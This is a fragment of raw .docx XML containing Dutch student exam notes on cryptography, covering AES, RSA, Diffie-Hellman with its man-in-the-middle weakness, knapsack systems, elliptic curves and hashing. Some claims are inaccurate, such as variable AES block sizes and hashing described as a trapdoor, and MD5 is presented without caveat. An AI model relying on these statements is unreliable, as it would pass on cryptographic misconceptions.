      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBF7DD" w14:textId="2CADE514" w:rsidR="008E4CF6" w:rsidRDefault="007C7DE0" w:rsidP="007C7DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gewonnen door </w:t>
      </w:r>
      <w:r w:rsidR="008E4CF6">
        <w:t>2 vlaamse onderzoeker</w:t>
      </w:r>
      <w:r w:rsidR="0023428E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008E4CF6">
        <w:t xml:space="preserve"> (Daemen/Rijmen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C5FD9" w14:textId="07DB70BE" w:rsidR="00AB499A" w:rsidRDefault="00AB499A" w:rsidP="00AB499A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="007C7DE0">
        <w:t xml:space="preserve">van 3DES met </w:t>
      </w:r>
      <w:r>
        <w:t>snelheid van DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E02EE99" w14:textId="51445939" w:rsidR="00041E46" w:rsidRDefault="00041E46" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deze standaard maakt </w:t>
      </w:r>
      <w:r w:rsidR="00A1255A">
        <w:t>ondersteunt Keysizes en Blocksizes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van 128, 192 of 256-bit KEYS</w:t>
      </w:r>
      <w:r w:rsidR="001C21C3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EE4EB" w14:textId="1C7D9A6F" w:rsidR="00C76240" w:rsidRDefault="00C76240" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Op de message (X) wordt eerst een XOR gedaan met een subkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EF5EF" w14:textId="199A482D" w:rsidR="00C76240" w:rsidRDefault="00C76240" w:rsidP="00C76240">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76240">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Subkey proces niet kennen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFB47F" w14:textId="38BD5B9E" w:rsidR="00C76240" w:rsidRPr="00C76240" w:rsidRDefault="00C76240" w:rsidP="00C76240">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Daarna 10 iteraties, waarvan 1 de eindronde is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C574A" w14:textId="0D44E6D6" w:rsidR="00C76240" w:rsidRPr="006166FD" w:rsidRDefault="0062209E" w:rsidP="00C76240">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Door de grote Keysize en Blocksize is dit niet te kraken voor moderne computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982316A" w14:textId="77777777" w:rsidR="006166FD" w:rsidRDefault="006166FD" w:rsidP="006166FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24815586" w14:textId="77777777" w:rsidR="006166FD" w:rsidRPr="006166FD" w:rsidRDefault="006166FD" w:rsidP="006166FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7F55ED" w14:textId="48BE8955" w:rsidR="00442234" w:rsidRDefault="00442234" w:rsidP="00442234">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc453378492"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Assymetrische Cryptografie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4B906B8C" w14:textId="77777777" w:rsidR="00260692" w:rsidRDefault="00260692" w:rsidP="00260692"/>
    <w:p w14:paraId="3DC1872C" w14:textId="5B574D4D" w:rsidR="00442234" w:rsidRDefault="00442234" w:rsidP="00442234">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Werkt </w:t>
      </w:r>
      <w:r w:rsidRPr="00442234">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">NIET </w:t>
      </w:r>
      <w:r>
        <w:t>met dezelfde Keys voor verzender en ontvanger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AB219" w14:textId="54EDBE65" w:rsidR="00930923" w:rsidRDefault="00442234" w:rsidP="00930923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Private Key en Public Key voor iedere persoon!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1512A2" w14:textId="4578C31E" w:rsidR="008E3794" w:rsidRDefault="008E3794" w:rsidP="00930923">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Public en Private Keys kunnen niet van mekaar worden afgeleid!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F32A5D" w14:textId="75AD35E1" w:rsidR="00F31BF6" w:rsidRDefault="00F31BF6" w:rsidP="00F31BF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maar ze hebben wel een wiskundig verband!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47708EE7" w14:textId="160A83EA" w:rsidR="005E2F14" w:rsidRDefault="005E2F14" w:rsidP="005E2F14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De Private Key wordt </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2F14">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NOOIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uitgedeeld!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629CD071" w14:textId="77777777" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="009E21C7"/>
    <w:p w14:paraId="1CE75D58" w14:textId="77777777" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="00224CFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Voordelen: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EEB2EE" w14:textId="41A22B92" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="009E21C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Key-Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E6944" w14:textId="77777777" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="009E21C7"/>
    <w:p w14:paraId="669EBFA0" w14:textId="1CB1E996" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="00F848F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Nadelen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C4B0E" w14:textId="1E7CD391" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="009E21C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Snelheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC38D3" w14:textId="77777777" w:rsidR="009E21C7" w:rsidRDefault="009E21C7" w:rsidP="009E21C7"/>
    <w:p w14:paraId="0B0F99AA" w14:textId="36C15363" w:rsidR="00BB4F1F" w:rsidRDefault="00BB4F1F" w:rsidP="00BB4F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 4 belangrijke soorten in de Assymetrische Cryptografie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511B0D6" w14:textId="02B9D897" w:rsidR="00BB4F1F" w:rsidRDefault="00BB4F1F" w:rsidP="00BB4F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RSA = in priemfactoren is de sterkte van dit algoritme!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AD3F0" w14:textId="33096A3D" w:rsidR="00BB4F1F" w:rsidRDefault="00BB4F1F" w:rsidP="00BB4F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Diffie-Hellman = Discrete Logarithmen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6B9FA" w14:textId="3F0935D7" w:rsidR="00BB4F1F" w:rsidRDefault="00BB4F1F" w:rsidP="00BB4F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Knapzaksysteem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636A321F" w14:textId="49D454D3" w:rsidR="00BB4F1F" w:rsidRDefault="00BB4F1F" w:rsidP="00F31BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Elliptische curven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C70149" w14:textId="77777777" w:rsidR="00F31BD1" w:rsidRDefault="00F31BD1" w:rsidP="00F31BD1"/>
    <w:p w14:paraId="4EE28344" w14:textId="62D2AE47" w:rsidR="00F31BD1" w:rsidRDefault="00F31BD1" w:rsidP="00F31BD1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774CD2F" w14:textId="77777777" w:rsidR="00F31BD1" w:rsidRDefault="00F31BD1" w:rsidP="00F31BD1"/>
    <w:p w14:paraId="66F0536C" w14:textId="23FF98E5" w:rsidR="00F31BD1" w:rsidRDefault="00F31BD1" w:rsidP="00F31BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ontbinden in priemfactoren = </w:t>
      </w:r>
      <w:r w:rsidRPr="0064149F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Factorisatie</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DDBBD" w14:textId="77777777" w:rsidR="00994B6C" w:rsidRDefault="00D90FFB" w:rsidP="00F31BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het hele proces moet je niet kennen voor het examen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D4C19" w14:textId="403023B1" w:rsidR="00DA3433" w:rsidRDefault="006C1FC3" w:rsidP="00611CE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00D90FFB">
        <w:t>nkel weten dat het op factorisatie gebaseerd is!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D609CE" w14:textId="77777777" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00611CE0"/>
    <w:p w14:paraId="7DCEEF44" w14:textId="06BDF30D" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00611CE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Diffie-Hellman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021EA34" w14:textId="77777777" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00611CE0"/>
    <w:p w14:paraId="7022945F" w14:textId="5FC0E7CB" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00611CE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Eerst</w:t>
      </w:r>
      <w:r w:rsidR="0000070B">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Public Key cryptosysteem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458252E8" w14:textId="2A1A2B00" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00611CE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wordt gebruikt om uitwisselen van keys te beheren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD32D9" w14:textId="730540EC" w:rsidR="00611CE0" w:rsidRDefault="00611CE0" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ook bekend als het </w:t>
      </w:r>
      <w:r w:rsidRPr="00837FF4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>koffer-principe</w:t>
      </w:r>
      <w:r w:rsidR="00837FF4" w:rsidRPr="00837FF4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00837FF4">
        <w:t xml:space="preserve">en maakt </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gebruik van </w:t>
      </w:r>
      <w:r w:rsidRPr="00837FF4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>discrete logaritmen</w:t>
      </w:r>
      <w:r w:rsidR="00837FF4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B233509" w14:textId="794E34EE" w:rsidR="00611CE0" w:rsidRPr="00E573D8" w:rsidRDefault="00E573D8" w:rsidP="00611CE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wel kwetsbaar voor een </w:t>
      </w:r>
      <w:r w:rsidRPr="00E573D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Man In The Middle Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48519675" w14:textId="63A4F6D9" w:rsidR="00E573D8" w:rsidRDefault="00E573D8" w:rsidP="00E573D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C stelt zich op tussen A en B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05D40D" w14:textId="095C0640" w:rsidR="00E573D8" w:rsidRDefault="00E573D8" w:rsidP="00E573D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicatie gebeurt vanaf tussen A en C en C en B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBC8FC" w14:textId="658A6B4C" w:rsidR="00486813" w:rsidRDefault="00486813" w:rsidP="00E573D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A en B hebben niet door dat C alles onderschept en hun berichten kan wijzigen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DFBAF" w14:textId="0889B61B" w:rsidR="00CB6B36" w:rsidRDefault="00CB6B36" w:rsidP="00E573D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Daarom best authenticatie gebruiken via </w:t>
      </w:r>
      <w:r w:rsidR="00705FF8">
        <w:t>een digitale handtekening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2E697" w14:textId="77777777" w:rsidR="00705FF8" w:rsidRDefault="00705FF8" w:rsidP="00705FF8"/>
    <w:p w14:paraId="79AD99D9" w14:textId="13F4147E" w:rsidR="00705FF8" w:rsidRDefault="00705FF8" w:rsidP="00705FF8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Knapzaksysteem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12582B32" w14:textId="77777777" w:rsidR="00705FF8" w:rsidRDefault="00705FF8" w:rsidP="00705FF8"/>
    <w:p w14:paraId="5B7DD356" w14:textId="5EE35915" w:rsidR="00705FF8" w:rsidRDefault="00C052D8" w:rsidP="00C052D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verzameling objecten met ieder een bepaald gewicht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A82D6C" w14:textId="0FEFF1EA" w:rsidR="00C052D8" w:rsidRDefault="00C052D8" w:rsidP="00C052D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aantal object wordt in de zak gestopt (welke objecten???)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD5418" w14:textId="0CE810EF" w:rsidR="00C052D8" w:rsidRDefault="00C052D8" w:rsidP="00C052D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gewicht en grootte van de verzameling is bekend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032065A5" w14:textId="2F06622E" w:rsidR="00C052D8" w:rsidRDefault="00C052D8" w:rsidP="00C052D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uitrekene</w:t>
      </w:r>
      <w:r w:rsidR="00813129">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van de lijst zelf is ondoenbaar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F632ED" w14:textId="66D37443" w:rsidR="0014215A" w:rsidRDefault="0014215A" w:rsidP="00C052D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4ADF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Dit is niet meer veilig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aangezien er een backdoor is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47119BFF" w14:textId="77777777" w:rsidR="00B967C7" w:rsidRDefault="0014215A" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Private en Public Key kan afgeleid worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0018CC" w14:textId="099A6B18" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00B967C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Elliptische Curven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012408BF" w14:textId="77777777" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00EE6BAA"/>
    <w:p w14:paraId="5E703577" w14:textId="6CA1961D" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ECC</w:t>
      </w:r>
      <w:r w:rsidR="00B967C7">
        <w:t xml:space="preserve"> = w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">erkt op basis van </w:t>
      </w:r>
      <w:r w:rsidRPr="00B967C7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Ellipsen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CDBB0" w14:textId="47E4FF1F" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00EE6BAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er liggen 2 punten op de curve, je moet k berekenen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11215C77" w14:textId="6A4F5377" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00EE6BAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dit is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>zeer snel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041DF71" w14:textId="70E427BD" w:rsidR="00EE6BAA" w:rsidRDefault="00EE6BAA" w:rsidP="00EE6BAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE6BAA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Korte sleutels</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met toch een degelijke security!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16B6A5" w14:textId="77777777" w:rsidR="00CD0F3B" w:rsidRPr="00CD0F3B" w:rsidRDefault="00936402" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0F3B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Dit is de toekomst</w:t>
      </w:r>
      <w:r w:rsidR="004007EE" w:rsidRPr="00CD0F3B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in de cryptografie!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243140DA" w14:textId="77777777" w:rsidR="00CD0F3B" w:rsidRDefault="00CD0F3B" w:rsidP="00CD0F3B"/>
    <w:p w14:paraId="64693B38" w14:textId="5B69AA23" w:rsidR="004C1789" w:rsidRDefault="00AD53FB" w:rsidP="00CD0F3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc453378493"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hashing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="12B13840" w14:textId="77777777" w:rsidR="00CD0F3B" w:rsidRDefault="00CD0F3B" w:rsidP="00CD0F3B"/>
    <w:p w14:paraId="73E000AF" w14:textId="40FB1701" w:rsidR="001D21D1" w:rsidRDefault="001D21D1" w:rsidP="001D21D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hashing is een eenrichtingsfunctie = valluik</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298855B1" w14:textId="6E4C239E" w:rsidR="00625900" w:rsidRDefault="00625900" w:rsidP="001D21D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit garandeert de integriteit van een bestand/boodschap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA876A3" w14:textId="6D9255D1" w:rsidR="00AD53FB" w:rsidRDefault="00C63DC1" w:rsidP="00AD53FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hash h = H(Message</w:t>
      </w:r>
      <w:r w:rsidR="00B92942">
        <w:t>) = vingerafdruk van de message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D813343" w14:textId="4468B819" w:rsidR="00EE4EDF" w:rsidRDefault="00B92942" w:rsidP="005C1961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MD5 en SHA zijn de meest voorkomende algoritmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0195D4BA" w14:textId="2ADCF417" w:rsidR="00AE4A34" w:rsidRDefault="005C1961" w:rsidP="00AE4A34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een kleine wijziging in de Message geeft een compleet andere Hash.</w:t>
      </w:r>
    </w:p>
